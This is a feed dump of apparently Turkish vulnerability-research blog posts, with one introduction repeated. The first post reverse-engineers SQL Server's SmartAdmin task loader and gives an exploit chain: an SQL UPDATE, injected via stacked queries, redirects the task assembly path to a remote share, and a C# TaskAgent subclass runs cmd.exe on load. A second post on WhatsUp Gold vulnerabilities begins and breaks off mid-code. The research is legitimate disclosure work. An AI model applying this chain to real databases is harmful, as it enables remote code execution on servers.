C# on exploit7 https://exploit7.tr/tags/c%23/ Recent content in C# on exploit7 Hugo -- gohugo.io tr-TR Fri, 11 Oct 2024 11:00:00 +0400 Sql Server Sad Agent https://exploit7.tr/posts/sqlserver/ Fri, 11 Oct 2024 11:00:00 +0400 https://exploit7.tr/posts/sqlserver/ <h2 id="sql-server-sad-agent">Sql Server Sad Agent</h2> <p>Sql server hepimizin bildigi Microsoft tarafindan gelistirilen veritabani yonetim sistemidir.</p> <h3 id="sad-agent">Sad Agent</h3> <p>Sql serverda birden fazla ozellik vardir bunlardan biri olan <code>Sql Agent</code> bugun onu inceleyecegiz. Sql Agent veritabani yonetimi ile ilgili zamanlanmis islemleri otomatize eden bir aractir.</p> <h3 id="microsoftsqlautoadminsqlautoadmin">Microsoft.SqlAutoAdmin.SqlAutoAdmin</h3> <p>Sql Agent islemlerini yapan dll <code>Microsoft.SqlAutoAdmin.SqlAutoAdmin.dll</code> bu dll <code>smartbackup</code>,<code>jobs</code> vs ozellikleri barindiran dll.</p> <h3 id="loadtaskagentassembly">LoadTaskAgentAssembly</h3> <p>SmartAdminManager&rsquo;de bulunan <code>LoadTaskAgentAssembly</code> metoduna bakalim.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">private</span> Assembly LoadTaskAgentAssembly(SmartAdminManager.TaskAgentDescriptor taskAgentDescriptor) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> Assembly assembly = <span style="color:#66d9ef">null</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text = taskAgentDescriptor.binaryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (!<span style="color:#66d9ef">string</span>.IsNullOrEmpty(taskAgentDescriptor.binaryPath)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> text = taskAgentDescriptor.binaryPath + <span style="color:#e6db74">&#34;\\&#34;</span> + text; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Trying to load task assembly from &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> assembly = Assembly.LoadFrom(text); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (FileNotFoundException) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Assembly not found at &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">null</span> == assembly) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> FileInfo fileInfo = <span style="color:#66d9ef">new</span> FileInfo(Assembly.GetExecutingAssembly().Location); </span></span><span style="display:flex;"><span> text = fileInfo.DirectoryName + <span style="color:#e6db74">&#34;\\&#34;</span> + taskAgentDescriptor.binaryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Trying again to load task assembly from &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> assembly = Assembly.LoadFrom(text); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (FileNotFoundException) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Assembly not found at &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">null</span> != assembly) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> taskAgentDescriptor.binaryPath = fileInfo.DirectoryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.UpdateTaskAgentPath(taskAgentDescriptor); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> assembly; </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><p>Burada kodu incelemeye baslamadan once dikkat etmemiz gereken <code>TaskAgentDescriptor</code> nested struct var onda da bakalim.</p> <h2 id="sql-server-sad-agent">Sql Server Sad Agent</h2> <p>Sql server hepimizin bildigi Microsoft tarafindan gelistirilen veritabani yonetim sistemidir.</p> <h3 id="sad-agent">Sad Agent</h3> <p>Sql serverda birden fazla ozellik vardir bunlardan biri olan <code>Sql Agent</code> bugun onu inceleyecegiz. Sql Agent veritabani yonetimi ile ilgili zamanlanmis islemleri otomatize eden bir aractir.</p> <h3 id="microsoftsqlautoadminsqlautoadmin">Microsoft.SqlAutoAdmin.SqlAutoAdmin</h3> <p>Sql Agent islemlerini yapan dll <code>Microsoft.SqlAutoAdmin.SqlAutoAdmin.dll</code> bu dll <code>smartbackup</code>,<code>jobs</code> vs ozellikleri barindiran dll.</p> <h3 id="loadtaskagentassembly">LoadTaskAgentAssembly</h3> <p>SmartAdminManager&rsquo;de bulunan <code>LoadTaskAgentAssembly</code> metoduna bakalim.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">private</span> Assembly LoadTaskAgentAssembly(SmartAdminManager.TaskAgentDescriptor taskAgentDescriptor) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> Assembly assembly = <span style="color:#66d9ef">null</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">string</span> text = taskAgentDescriptor.binaryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (!<span style="color:#66d9ef">string</span>.IsNullOrEmpty(taskAgentDescriptor.binaryPath)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> text = taskAgentDescriptor.binaryPath + <span style="color:#e6db74">&#34;\\&#34;</span> + text; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Trying to load task assembly from &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> assembly = Assembly.LoadFrom(text); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (FileNotFoundException) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Assembly not found at &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">null</span> == assembly) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> FileInfo fileInfo = <span style="color:#66d9ef">new</span> FileInfo(Assembly.GetExecutingAssembly().Location); </span></span><span style="display:flex;"><span> text = fileInfo.DirectoryName + <span style="color:#e6db74">&#34;\\&#34;</span> + taskAgentDescriptor.binaryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Trying again to load task assembly from &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> assembly = Assembly.LoadFrom(text); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">catch</span> (FileNotFoundException) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager: Assembly not found at &#34;</span> + text + <span style="color:#e6db74">&#34;\n&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">null</span> != assembly) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> taskAgentDescriptor.binaryPath = fileInfo.DirectoryName; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.UpdateTaskAgentPath(taskAgentDescriptor); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> assembly; </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><p>Burada kodu incelemeye baslamadan once dikkat etmemiz gereken <code>TaskAgentDescriptor</code> nested struct var onda da bakalim.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span> <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">TaskAgentDescriptor</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x040000CC RID: 204</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">string</span> binaryName; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x040000CD RID: 205</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">string</span> binaryPath; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x040000CE RID: 206</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">string</span> className; </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><ol> <li>Assembly assembly = null; olarak tanimlaniyor.</li> <li><code>taskAgentDescriptor.binaryName</code> degeri text degiskenine ataniyor.</li> <li>Eger <code>binaryPath</code> bos degilse <code>binaryPath + &quot;\\&quot;+ text</code> birlestiriliyor.</li> <li>ardindan <code>Assembly.LoadFrom</code> ile binary cagiriliyor.</li> </ol> <p>Onemli nokta <code>Assembly.LoadFrom</code> ama tek basina rce icin yeterli degil (ntlm relay vs icin yeterlidir.)</p> <h3 id="loadtaskagentassembly-trace">LoadTaskAgentAssembly Trace</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span>Microsoft.SqlServer.SmartAdmin.SmartAdminManager.LoadTaskAgentAssembly(SmartAdminManager.TaskAgentDescriptor) : Assembly <span style="color:#960050;background-color:#1e0010">@</span><span style="color:#ae81ff">060000D7</span> </span></span><span style="display:flex;"><span> Microsoft.SqlServer.SmartAdmin.SmartAdminManager.Run() : <span style="color:#66d9ef">void</span> <span style="color:#960050;background-color:#1e0010">@</span><span style="color:#ae81ff">060000D9</span> </span></span><span style="display:flex;"><span> Microsoft.SqlServer.SmartAdmin.SmartAdminManager.Start(INativeServices) : <span style="color:#66d9ef">bool</span> <span style="color:#960050;background-color:#1e0010">@</span><span style="color:#ae81ff">060000D4</span> </span></span></code></pre></div><h3 id="gettaskagentdescriptors">GetTaskAgentDescriptors</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">private</span> SmartAdminManager.TaskAgentDescriptor[] GetTaskAgentDescriptors() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> SmartAdminManager.TaskAgentDescriptor[] array = <span style="color:#66d9ef">null</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;TaskMetadataService.GetTasks: Getting SqlConnectivity Service.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;GetTaskAgentDescriptors: Getting Sql connection.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">int</span> num = <span style="color:#ae81ff">0</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">using</span> (SqlConnection privateConnection = <span style="color:#66d9ef">this</span>.sqlConnectivityService.GetPrivateConnection(<span style="color:#66d9ef">false</span>)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;GetTaskAgentDescriptors: Getting number of tasks to execute.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">using</span> (SqlCommand sqlCommand = <span style="color:#66d9ef">new</span> SqlCommand(<span style="color:#e6db74">&#34;SELECT COUNT(*) FROM autoadmin_task_agents&#34;</span>, privateConnection)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">using</span> (SqlDataReader sqlDataReader = sqlCommand.ExecuteReader()) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">while</span> (sqlDataReader.Read()) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> array = <span style="color:#66d9ef">null</span>; </span></span><span style="display:flex;"><span> array = <span style="color:#66d9ef">new</span> SmartAdminManager.TaskAgentDescriptor[sqlDataReader.GetInt32(<span style="color:#ae81ff">0</span>)]; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;TaskMetadataService.GetTasks: Getting task details.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">using</span> (SqlCommand sqlCommand2 = <span style="color:#66d9ef">new</span> SqlCommand(<span style="color:#e6db74">&#34;SELECT * FROM autoadmin_task_agents&#34;</span>, privateConnection)) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">using</span> (SqlDataReader sqlDataReader2 = sqlCommand2.ExecuteReader()) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">while</span> (sqlDataReader2.Read()) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> array[num].binaryName = sqlDataReader2.GetString(<span style="color:#ae81ff">1</span>); </span></span><span style="display:flex;"><span> array[num].binaryPath = sqlDataReader2.GetString(<span style="color:#ae81ff">2</span>); </span></span><span style="display:flex;"><span> array[num].className = sqlDataReader2.GetString(<span style="color:#ae81ff">3</span>); </span></span><span style="display:flex;"><span> num++; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><h3 id="run">Run</h3> <p><img src="https://exploit7.tr/resource/run.png" alt="run"></p> <ol> <li><code>GetTaskAgentDescriptors</code> methodunu cagirarak task agent descriptors kisimlarini aliyor ve arraya atiyor.</li> <li><code>GetTaskAgentDescriptors</code> methodunun gorevi sql baglantisi kurup <code>autoadmin_task_agents</code> tablosuna count atiyor ardindan <code>autoadmin_task_agents</code> tablosuna select atiyor.</li> <li>Select sorgusundan donen her veriyi <code>binaryName</code>,<code>binaryPath</code>,<code>className</code> degerlerini <code>taskAgentDescriptor</code> arrayina atiyor.</li> </ol> <p><code>Run</code> methodunda onemli ve bizi ilgilendiren kisim else bolumu.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span>Type type = assembly.GetType(taskAgentDescriptor.className); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (type == <span style="color:#66d9ef">null</span> || !type.IsSubclassOf(<span style="color:#66d9ef">typeof</span>(TaskAgent))) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.loggerService.Log(<span style="color:#e6db74">&#34;[SmartAdmin] Task agent &#34;</span> + taskAgentDescriptor.binaryName + <span style="color:#e6db74">&#34; was loaded but is not compatible with the current version of SqlAutAdmin&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">else</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager.Run: Creating task instance.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.taskAgents[i] = (TaskAgent)assembly.CreateInstance(type.FullName); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager.Run: Starting the task.\n&#34;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.taskAgents[i].Start(<span style="color:#66d9ef">this</span>); </span></span><span style="display:flex;"><span> array[i] = <span style="color:#66d9ef">new</span> Thread(<span style="color:#66d9ef">new</span> ThreadStart(<span style="color:#66d9ef">this</span>.taskAgents[i].DoWork)); </span></span><span style="display:flex;"><span> array[i].Name = <span style="color:#66d9ef">this</span>.taskAgents[i].GetName(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">this</span>.DebugLog(<span style="color:#e6db74">&#34;SmartAdminManager.Run: Starting the task thread.\n&#34;</span>); </span></span><span style="display:flex;"><span> array[i].Start(); </span></span></code></pre></div><ol> <li><code>assembly.GetType(taskAgentDescriptor.className)</code> ile assembly&rsquo;den <code>taskAgentDescriptor.className</code> type degerini aliyor.</li> <li>Alinan type degeri null ise veya typeof ile <code>TaskAgent</code> classindan mi aliyor.</li> <li><code>CreateInstance</code> type&rsquo;daki FullName&rsquo;i alir. (Not:<code>CreateInstance</code> c# da belirli bir class,struct degerlerinin dinamik instance olusturmak icin kullanir.)</li> <li>Ardindan <code>Start</code> metoduna gonderir.</li> </ol> <h3 id="issubclassof">IsSubclassOf</h3> <p>IsSubclassOf bir reflection methodudur. Biraz buna baktigimda gordum ki belirli bir type degerinin baska bir type&rsquo;in (class&rsquo;in) alt sinifi olup olmadigini kontrol ediyor bu kodda da bize type bypass kolayligi sagliyor.</p> <h3 id="taskagent">TaskAgent</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">using</span> System; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">namespace</span> Microsoft.SqlServer.SmartAdmin </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0200002B RID: 43</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">abstract</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">TaskAgent</span> </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0600010A RID: 266</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">abstract</span> <span style="color:#66d9ef">void</span> Start(IServicesFactory services); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0600010B RID: 267</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">abstract</span> <span style="color:#66d9ef">void</span> Stop(); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0600010C RID: 268</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">abstract</span> <span style="color:#66d9ef">void</span> DoWork(); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0600010D RID: 269</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">abstract</span> <span style="color:#66d9ef">void</span> ExternalJob(<span style="color:#66d9ef">string</span> command, LogBaseService jobLogger); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x0600010E RID: 270 RVA: 0x000060B8 File Offset: 0x000050B8</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">string</span> GetName() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.taskAgentSignature; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#75715e">// Token: 0x040000C8 RID: 200</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">protected</span> <span style="color:#66d9ef">string</span> taskAgentSignature; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h3 id="exploit7-bolumu">Exploit7 Bolumu</h3> <p>Sql injection uzerinden stack query varsa yapilabilir.</p> <p><code>update autoadmin_task_agents set task_assembly_name = &quot;class.dll&quot;, task_assembly_path=&quot;\\remote-server\\ping.dll&quot;,className=&quot;Class1.Class1&quot;;</code></p> <p><code>Microsoft.SqlServer.SmartAdmin</code> TaskAgent classindan bir class turetelim.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span><span style="color:#66d9ef">using</span> Microsoft.SqlServer.SmartAdmin; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">using</span> System; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">using</span> System.Diagnostics; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">namespace</span> Class1 </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">class</span> <span style="color:#a6e22e">Class1</span> : TaskAgent </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> Class1() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> Process process = <span style="color:#66d9ef">new</span> Process(); </span></span><span style="display:flex;"><span> process.StartInfo.FileName = <span style="color:#e6db74">&#34;cmd.exe&#34;</span>; </span></span><span style="display:flex;"><span> process.StartInfo.Arguments = <span style="color:#e6db74">&#34;/c ping localhost -t&#34;</span>; </span></span><span style="display:flex;"><span> process.StartInfo.UseShellExecute = <span style="color:#66d9ef">false</span>; </span></span><span style="display:flex;"><span> process.StartInfo.RedirectStandardOutput = <span style="color:#66d9ef">true</span>; </span></span><span style="display:flex;"><span> process.Start(); </span></span><span style="display:flex;"><span> process.WaitForExit(); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">override</span> <span style="color:#66d9ef">void</span> DoWork() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">override</span> <span style="color:#66d9ef">void</span> ExternalJob(<span style="color:#66d9ef">string</span> command, LogBaseService jobLogger) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">override</span> <span style="color:#66d9ef">void</span> Start(IServicesFactory services) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">override</span> <span style="color:#66d9ef">void</span> Stop() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">void</span> Test() </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p><img src="https://exploit7.tr/resource/rcesql.gif" alt="rce"></p> WhatsUp Gold Unauth Series https://exploit7.tr/posts/whatsupgold/ Thu, 10 Oct 2024 11:00:00 +0400 https://exploit7.tr/posts/whatsupgold/ <h2 id="whatsup-gold-unauth-series">WhatsUp Gold Unauth Series</h2> <p>WhatsUp Gold Progress firmasi tarafindan gelistirilmis network monitoring aracidir, bu urunu incelemeye basladigimda buldugum aciklari bildirmek icin biraz gec kaldim, elimde sadece daha once yazdigim bu yazi kaldi, yaziyi da duzenleyip, detaylandirip paylasiyorum. Bu aciklardan bir kac tanesini <a href="https://x.com/SinSinology">SinSinology</a> (blogu) <a href="https://summoning.team/advisories/">summoning.team</a> adli ve diger arastirmaci arkadaslar blog olarak yayinladi bende kendi buldugum kadariyla paylasmak istiyorum keyifli okumalar.</p> <p><img src="https://exploit7.tr/resource/zdi.png" alt="LOAD"></p> <p>Not: WhatsUp Gold&rsquo;un eski surumu oldugu icin tekrar indiremedim eski exesi duruyormus fakat lisans problemi vs ile karsilastim bu yuzden yazimda eski oldugu icin bazi kodlar eksik.</p> <h2 id="whatsup-gold-unauth-series">WhatsUp Gold Unauth Series</h2> <p>WhatsUp Gold Progress firmasi tarafindan gelistirilmis network monitoring aracidir, bu urunu incelemeye basladigimda buldugum aciklari bildirmek icin biraz gec kaldim, elimde sadece daha once yazdigim bu yazi kaldi, yaziyi da duzenleyip, detaylandirip paylasiyorum. Bu aciklardan bir kac tanesini <a href="https://x.com/SinSinology">SinSinology</a> (blogu) <a href="https://summoning.team/advisories/">summoning.team</a> adli ve diger arastirmaci arkadaslar blog olarak yayinladi bende kendi buldugum kadariyla paylasmak istiyorum keyifli okumalar.</p> <p><img src="https://exploit7.tr/resource/zdi.png" alt="LOAD"></p> <p>Not: WhatsUp Gold&rsquo;un eski surumu oldugu icin tekrar indiremedim eski exesi duruyormus fakat lisans problemi vs ile karsilastim bu yuzden yazimda eski oldugu icin bazi kodlar eksik.</p> <h3 id="whatsup-gold-extensions">WhatsUp Gold Extensions</h3> <p>WhatsUp Gold&rsquo;da birden fazla extension defaultta kurulu gelmektedir 2023.1.1 - 2023.1.3&rsquo;e kadar olan surumlerde bu eklentiler vardir (2023.1.3&rsquo;de APM WUG eklentilerindeki aciklari fixlediler.) <code>Agent</code>,<code>APM</code>,<code>Common</code>,<code>FlowMonitor</code>,<code>Wireless</code>,<code>WUG</code>. (yanlis bilgi vermemek acisindan hatirladigim extensionlar bunlar)</p> <h3 id="vuln-trace-wug">Vuln Trace (WUG)</h3> <p>WhatsUp Gold WUG eklentisi admin islemleri, database baglantisi, error yonetimi vs&hellip; sorumlu eklentidir.</p> <ol> <li>SessionController LoadPlugin =&gt; LoadUsingBasePath =&gt; LoadPluginFromFile</li> </ol> <p>SessionController kontrollerinde <code>LoadPlugin</code> methodu var LoadPlugin name,title,sParams adinda parametreler aliyor ve <code>LoadUsingBasePath</code> methoduna gonderiyor.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-csharp" data-lang="csharp"><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">public</span> ActionResult LoadPlugin(<span style="color:#66d9ef">string</span> name, <span style="color:#66d9ef">string</span> title = <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#66d9ef">string</span> sParams = <span style="color:#e6db74">&#34;&#34;</span>) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.LoadUsingBasePath(<span style="color:#e6db74">&#34;~/ux/plugins/&#34;</span>, name, title, sParams, <span style="color:#66d9ef">true</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">private</span> ContentResult LoadUsingBasePath(<span style="color:#66d9ef">string</span> inputBasePath, <span style="color:#66d9ef">string</span> name, <span style="color:#66d9ef">string</span> title = <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#66d9ef">string</span> sParams = <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#66d9ef">bool</span> useStickys = <span style="color:#66d9ef">true</span>) 